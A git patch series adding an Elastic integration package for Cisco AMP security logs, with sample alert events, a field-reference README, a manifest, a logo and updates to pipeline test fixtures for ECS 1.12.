+    "event": {
+        "severity": 2,
+        "ingested": "2021-09-12T17:32:10.094015339Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+        "kind": "alert",
+        "action": "Quarantine Failure",
+        "id": "6419229331435815000",
+        "category": [
+            "malware"
+        ]
+    },
+    "cisco": {
+        "amp": {
+            "computer": {
+                "active": true,
+                "network_addresses": [
+                    {
+                        "mac": "53:74:31:cb:37:50",
+                        "ip": "10.10.10.10"
+                    }
+                ],
+                "connector_guid": "test_connector_guid",
+                "external_ip": "8.8.8.8"
+            },
+            "file": {
+                "disposition": "Malicious",
+                "identity": {}
+            },
+            "connector_guid": "test_connector_guid",
+            "related": {
+                "mac": [
+                    "53:74:31:cb:37:50"
+                ]
+            },
+            "group_guids": [
+                "test_group_guid"
+            ],
+            "error": {
+                "description": "Delete pending",
+                "error_code": 3221225558
+            },
+            "detection_id": "6419229327140847663",
+            "event_type_id": 2164260880
+        }
+    },
+    "tags": [
+        "preserve_original_event"
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md
new file mode 100644
index 00000000000..4a510396534
--- /dev/null
+++ b/packages/cisco_amp/docs/README.md
@@ -0,0 +1,236 @@
+# Cisco AMP Integration
+
+This integration is for Cisco AMP logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco AMP logs.
+
+## Logs
+
+### AMP
+
+The `log` dataset collects Cisco AMP logs.
+
+An example event for `log` looks as following:
+
+```json
+{
+    "@timestamp": "2021-01-14T14:41:05.000Z",
+    "file": {
+        "hash": {
+            "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        }
+    },
+    "ecs": {
+        "version": "1.11.0"
+    },
+    "related": {
+        "hosts": [
+            "Demo_WannaCry_Ransomware"
+        ],
+        "hash": [
+            "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        ],
+        "ip": [
+            "8.8.8.8",
+            "10.10.10.10"
+        ]
+    },
+    "host": {
+        "name": "Demo_WannaCry_Ransomware",
+        "hostname": "Demo_WannaCry_Ransomware"
+    },
+    "event": {
+        "severity": 2,
+        "ingested": "2021-09-12T17:32:10.094015339Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+        "kind": "alert",
+        "action": "Quarantine Failure",
+        "id": "6419229331435815000",
+        "category": [
+            "malware"
+        ]
+    },
+    "cisco": {
+        "amp": {
+            "computer": {
+                "active": true,
+                "network_addresses": [
+                    {
+                        "mac": "53:74:31:cb:37:50",
+                        "ip": "10.10.10.10"
+                    }
+                ],
+                "connector_guid": "test_connector_guid",
+                "external_ip": "8.8.8.8"
+            },
+            "file": {
+                "disposition": "Malicious",
+                "identity": {}
+            },
+            "connector_guid": "test_connector_guid",
+            "related": {
+                "mac": [
+                    "53:74:31:cb:37:50"
+                ]
+            },
+            "group_guids": [
+                "test_group_guid"
+            ],
+            "error": {
+                "description": "Delete pending",
+                "error_code": 3221225558
+            },
+            "detection_id": "6419229327140847663",
+            "event_type_id": 2164260880
+        }
+    },
+    "tags": [
+        "preserve_original_event"
+    ]
+}
+```
+
+**Exported fields**
+
+| Field | Description | Type |
+|---|---|---|
+| @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date |
+| cisco.amp.bp_data | Endpoint isolation information | flattened |
+| cisco.amp.cloud_ioc.description | Description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.amp.cloud_ioc.short_description | Short description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.amp.command_line.arguments | The CLI arguments related to the Cloud Threat IOC reported by Cisco. | keyword |
+| cisco.amp.computer.active | If the current endpoint is active or not. | boolean |
+| cisco.amp.computer.connector_guid | The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. | keyword |
+| cisco.amp.computer.external_ip | The external IP of the related host. | ip |
+| cisco.amp.computer.network_addresses | All network interface information on the related host. | flattened |
+| cisco.amp.connector_guid | The GUID of the connector sending information to AMP. | keyword |
+| cisco.amp.detection | The name of the malware detected. | keyword |
+| cisco.amp.detection_id | The ID of the detection. | keyword |
+| cisco.amp.error.description | Description of an endpoint error event. | keyword |
+| cisco.amp.error.error_code | The error code describing the related error event. | long |
+| cisco.amp.event_type_id | A sub ID of the event, depending on event type. | long |
+| cisco.amp.file.archived_file.disposition | Categorization of a file archive related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.file.archived_file.identity.md5 | MD5 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.archived_file.identity.sha1 | SHA1 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.archived_file.identity.sha256 | SHA256 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.attack_details.application | The application name related to Exploit Prevention events. | keyword |
+| cisco.amp.file.attack_details.attacked_module | Path to the executable or dll that was attacked and detected by Exploit Prevention. | keyword |
+| cisco.amp.file.attack_details.base_address | The base memory address related to the exploit detected. | keyword |
+| cisco.amp.file.attack_details.indicators | Different indicator types that matches the exploit detected, for example different MITRE tactics. | flattened |
+| cisco.amp.file.attack_details.suspicious_files | An array of related files when an attack is detected by Exploit Prevention. | keyword |
+| cisco.amp.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword |
+| cisco.amp.mitre_tactics | Array of all related mitre tactic ID's | keyword |
+| cisco.amp.mitre_techniques | Array of all related mitre technique ID's | keyword |
+| cisco.amp.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.network_info.nfm.direction | The current direction based on source and destination IP. | keyword |
+| cisco.amp.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword |
+| cisco.amp.network_info.parent.identify.sha256 | SHA256 hash of the related IOC. | keyword |
+| cisco.amp.network_info.parent.identity.md5 | MD5 hash of the related IOC. | keyword |
+| cisco.amp.network_info.parent.identity.sha1 | SHA1 hash of the related IOC. | keyword |
+| cisco.amp.related.cve | An array of all related CVEs | keyword |
+| cisco.amp.related.mac | An array of all related MAC addresses. | keyword |
+| cisco.amp.scan.clean | Boolean value if a scanned file was clean or not. | boolean |
+| cisco.amp.scan.description | Description of an event related to a scan being initiated, for example the specific directory name. | keyword |
+| cisco.amp.scan.malicious_detections | Count of malicious files or documents detected related to a single scan event. | long |
+| cisco.amp.scan.scanned_files | Count of files scanned in a directory. | long |
+| cisco.amp.scan.scanned_paths | Count of different directories scanned related to a single scan event. | long |
+| cisco.amp.scan.scanned_processes | Count of processes scanned related to a single scan event. | long |
+| cisco.amp.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.amp.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.amp.threat_hunting.incident_end_time | When the threat hunt finalized or closed. | date |
+| cisco.amp.threat_hunting.incident_hunt_guid | The GUID of the related investigation tracking issue. | keyword |
+| cisco.amp.threat_hunting.incident_id | The id of the related incident for the threat hunting activity. | long |
+| cisco.amp.threat_hunting.incident_remediation | Recommendations to resolve the vulnerability or exploited host. | keyword |
+| cisco.amp.threat_hunting.incident_report_guid | The GUID of the related threat hunting report. | keyword |
+| cisco.amp.threat_hunting.incident_start_time | When the threat hunt was initiated. | date |
+| cisco.amp.threat_hunting.incident_summary | Summary of the outcome on the threat hunting activity. | keyword |
+| cisco.amp.threat_hunting.incident_title | Title of the incident related to the threat hunting activity. | keyword |
+| cisco.amp.threat_hunting.severity | Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. | keyword |
+| cisco.amp.threat_hunting.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.amp.threat_hunting.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.amp.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date |
+| cisco.amp.vulnerabilities | An array of related vulnerabilities to the malicious event. | flattened |
+| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword |
+| cloud.availability_zone | Availability zone in which this host is running. | keyword |
+| cloud.image.id | Image ID for the cloud instance. | keyword |
+| cloud.instance.id | Instance ID of the host machine. | keyword |
+| cloud.instance.name | Instance name of the host machine. | keyword |
+| cloud.machine.type | Machine type of the host machine. | keyword |
+| cloud.project.id | Name of the project in Google Cloud. | keyword |
+| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword |
+| cloud.region | Region in which this host is running. | keyword |
+| container.id | Unique container id. | keyword |
+| container.image.name | Name of the image the container was built on. | keyword |
+| container.labels | Image labels. | object |
+| container.name | Container name. | keyword |
+| data_stream.dataset | Data stream dataset. | constant_keyword |
+| data_stream.namespace | Data stream namespace. | constant_keyword |
+| data_stream.type | Data stream type. | constant_keyword |
+| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket.  You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
+| destination.as.organization.name | Organization name. | keyword |
+| destination.domain | Destination domain. | keyword |
+| destination.geo.city_name | City name. | keyword |
+| destination.geo.continent_name | Name of the continent. | keyword |
+| destination.geo.country_iso_code | Country ISO code. | keyword |
+| destination.geo.country_name | Country name. | keyword |
+| destination.geo.location | Longitude and latitude. | geo_point |
+| destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
+| destination.port | Port of the destination. | long |
+| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
+| error.message | Error message. | text |
+| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
+| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
+| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |
+| event.dataset | Event dataset | constant_keyword |
+| event.id | Unique ID to describe the event. | keyword |
+| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred.  It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.module | Event module | constant_keyword |
+| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword |
+| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword |
+| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long |
+| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword |
+| file.hash.md5 | MD5 hash. | keyword |
+| file.hash.sha1 | SHA1 hash. | keyword |
+| file.hash.sha256 | SHA256 hash. | keyword |
+| file.name | Name of the file including the extension, without the directory. | keyword |
+| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword |
+| host.architecture | Operating system architecture. | keyword |
+| host.containerized | If the host is a container. | boolean |
+| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
+| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword |
+| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword |
+| host.ip | Host ip addresses. | ip |
+| host.mac | Host mac addresses. | keyword |
+| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword |
+| host.os.build | OS build information. | keyword |
+| host.os.codename | OS codename, if any. | keyword |
+| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword |
+| host.os.kernel | Operating system kernel version as a raw string. | keyword |
+| host.os.name | Operating system name, without the version. | keyword |
+| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword |
+| host.os.version | Operating system version as a raw string. | keyword |
+| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword |
+| input.type | Type of Filebeat input. | keyword |
+| log.file.path | Full path to the log file this event came from. | keyword |
+| log.flags | Flags for the log file. | keyword |
+| log.offset | Offset of the entry in the log file. | long |
+| log.source.address | Source address from which the log event was read / sent from. | keyword |
+| network.direction | Direction of the network traffic. Recommended values are:   \* ingress   \* egress   \* inbound   \* outbound   \* internal   \* external   \* unknown  When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
+| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". | keyword |
+| process.hash.md5 | MD5 hash. | keyword |
+| process.hash.sha1 | SHA1 hash. | keyword |
+| process.hash.sha256 | SHA256 hash. | keyword |
+| process.name | Process name. Sometimes called program name or similar. | keyword |
+| process.pid | Process id. | long |
+| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.port | Port of the source. | long |
+| tags | List of keywords used to tag each event. | keyword |
+
diff --git a/packages/cisco_amp/img/cisco.svg b/packages/cisco_amp/img/cisco.svg
new file mode 100644
index 00000000000..20ebebf1974
--- /dev/null
+++ b/packages/cisco_amp/img/cisco.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="216" height="216" fill="#049fd9"><g transform="translate(0 50.059)"><path d="M106.48 76.238c-.282-.077-4.621-1.196-9.232-1.196-8.73 0-13.986 4.714-13.986 11.734 0 6.214 4.397 9.313 9.674 10.98.585.193 1.447.463 2.021.653 2.349.739 4.224 1.837 4.224 3.739 0 2.127-2.167 3.504-6.878 3.504-4.14 0-8.109-1.184-8.945-1.395v8.637c.466.099 5.183 1.025 10.222 1.025 7.248 0 15.539-3.167 15.539-12.595 0-4.573-2.8-8.783-8.947-10.737l-2.613-.832c-1.559-.492-4.342-1.289-4.342-3.574 0-1.805 2.062-3.076 5.859-3.076 3.276 0 7.263 1.101 7.404 1.145zm80.041 18.243c0 5.461-4.183 9.879-9.796 9.879-5.619 0-9.791-4.418-9.791-9.879 0-5.45 4.172-9.87 9.791-9.87 5.613 0 9.796 4.42 9.796 9.87m-9.796-19.427c-11.544 0-19.823 8.707-19.823 19.427 0 10.737 8.279 19.438 19.823 19.438 11.543 0 19.834-8.701 19.834-19.438 0-10.72-8.291-19.427-19.834-19.427M70.561 113.251h-9.472V75.719h9.472"/><path id="a" d="M48.07 76.399c-.89-.264-4.18-1.345-8.636-1.345-11.526 0-19.987 8.218-19.987 19.427 0 12.093 9.34 19.438 19.987 19.438 4.23 0 7.459-1.002 8.636-1.336v-10.075c-.407.226-3.503 1.992-7.957 1.992-6.31 0-10.38-4.441-10.38-10.019 0-5.748 4.246-10.011 10.38-10.011 4.53 0 7.576 1.805 7.957 2.004"/><use transform="translate(98.86)" xlink:href="#a" width="100%" height="100%"/><g id="c"><path id="b" d="M61.061 4.759c0-2.587-2.113-4.685-4.703-4.685-2.589 0-4.702 2.098-4.702 4.685v49.84a4.701 4.701 0 004.702 4.699 4.701 4.701 0 004.703-4.699zM35.232 22.451c0-2.586-2.112-4.687-4.702-4.687s-4.702 2.101-4.702 4.687v22.785a4.701 4.701 0 004.702 4.699 4.701 4.701 0 004.702-4.699zM9.404 35.383c0-2.587-2.112-4.684-4.702-4.684C2.115 30.699 0 32.796 0 35.383v9.853a4.703 4.703 0 009.404 0"/><use transform="matrix(-1 0 0 1 112.717 0)" xlink:href="#b" width="100%" height="100%"/></g><use transform="matrix(-1 0 0 1 216 0)" xlink:href="#c" width="100%" height="100%"/></g></svg>
\ No newline at end of file
diff --git a/packages/cisco_amp/manifest.yml b/packages/cisco_amp/manifest.yml
new file mode 100644
index 00000000000..e601af7c7f9
--- /dev/null
+++ b/packages/cisco_amp/manifest.yml
@@ -0,0 +1,28 @@
+format_version: 1.0.0
+name: cisco_amp
+title: Cisco AMP
+version: 0.0.1
+license: basic
+description: This Elastic integration collects logs from Cisco AMP network devices
+type: integration
+categories:
+  - network
+  - security
+release: experimental
+conditions:
+  kibana.version: "^7.16.0"
+icons:
+  - src: /img/cisco.svg
+    title: cisco
+    size: 216x216
+    type: image/svg+xml
+policy_templates:
+  - name: cisco_amp
+    title: Cisco AMP logs
+    description: Collect logs from Cisco AMP
+    inputs:
+      - type: httpjson
+        title: Collect logs from Cisco AMP API
+        description: Collecting logs from Cisco AMP API
+owner:
+  github: elastic/security-external-integrations

From 24c567a099c336da5adba5bda26082925a1fe950 Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Sun, 12 Sep 2021 19:49:02 +0000
Subject: [PATCH 2/9] Update changelog

---
 packages/cisco_amp/changelog.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/packages/cisco_amp/changelog.yml b/packages/cisco_amp/changelog.yml
index 0b98c79f61c..5a5fc28efef 100644
--- a/packages/cisco_amp/changelog.yml
+++ b/packages/cisco_amp/changelog.yml
@@ -3,4 +3,4 @@
   changes:
     - description: Initial migration from Filebeat Module
       type: enhancement
-      link: https://github.com/elastic/integrations/pull/
+      link: https://github.com/elastic/integrations/pull/1645

From 3f254a427cbd7a735edb740f629d8a3e740f8973 Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Mon, 13 Sep 2021 18:10:42 +0000
Subject: [PATCH 3/9] Update to ECS 1.12

---
 packages/cisco_amp/_dev/build/build.yml       |   2 +-
 ...co_amp1.ndjson.log => test-cisco-amp1.log} |   0
 ...json => test-cisco-amp1.log-expected.json} | 196 ++++-----
 ...co_amp2.ndjson.log => test-cisco-amp2.log} |   0
 ...json => test-cisco-amp2.log-expected.json} | 168 ++++----
 ...co_amp3.ndjson.log => test-cisco-amp3.log} |   0
 ...json => test-cisco-amp3.log-expected.json} | 180 ++++----
 ...co_amp4.ndjson.log => test-cisco-amp4.log} |   0
 ...json => test-cisco-amp4.log-expected.json} | 400 +++++++++---------
 ...co_amp5.ndjson.log => test-cisco-amp5.log} |   0
 ...json => test-cisco-amp5.log-expected.json} | 248 +++++------
 ...co_amp6.ndjson.log => test-cisco-amp6.log} |   0
 ...json => test-cisco-amp6.log-expected.json} | 212 +++++-----
 ...co_amp7.ndjson.log => test-cisco-amp7.log} |   0
 ...json => test-cisco-amp7.log-expected.json} | 196 ++++-----
 .../elasticsearch/ingest_pipeline/default.yml |   7 +-
 packages/cisco_amp/docs/README.md             |   2 +-
 17 files changed, 803 insertions(+), 808 deletions(-)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{test-cisco_amp1.ndjson.log => test-cisco-amp1.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{test-cisco_amp1.ndjson.log-expected.json => test-cisco-amp1.log-expected.json} (97%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp2.ndjson.log => test-cisco-amp2.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp2.ndjson.log-expected.json => test-cisco-amp2.log-expected.json} (98%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp3.ndjson.log => test-cisco-amp3.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp3.ndjson.log-expected.json => test-cisco-amp3.log-expected.json} (97%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp4.ndjson.log => test-cisco-amp4.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp4.ndjson.log-expected.json => test-cisco-amp4.log-expected.json} (97%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp5.ndjson.log => test-cisco-amp5.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp5.ndjson.log-expected.json => test-cisco-amp5.log-expected.json} (98%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp6.ndjson.log => test-cisco-amp6.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp6.ndjson.log-expected.json => test-cisco-amp6.log-expected.json} (97%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp7.ndjson.log => test-cisco-amp7.log} (100%)
 rename packages/cisco_amp/data_stream/log/_dev/test/pipeline/{cisco_amp7.ndjson.log-expected.json => test-cisco-amp7.log-expected.json} (97%)

diff --git a/packages/cisco_amp/_dev/build/build.yml b/packages/cisco_amp/_dev/build/build.yml
index a138b554aa0..08d85edcf9a 100644
--- a/packages/cisco_amp/_dev/build/build.yml
+++ b/packages/cisco_amp/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
   ecs:
-    reference: git@1.11
+    reference: git@1.12
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index 3ef7fced190..a2729963432 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -12,7 +12,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -38,7 +38,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701333474Z",
+                "ingested": "2021-09-13T18:06:29.783713069Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -86,7 +86,7 @@
         {
             "@timestamp": "2021-01-14T10:15:29.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -104,7 +104,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:35.701337792Z",
+                "ingested": "2021-09-13T18:06:29.783719163Z",
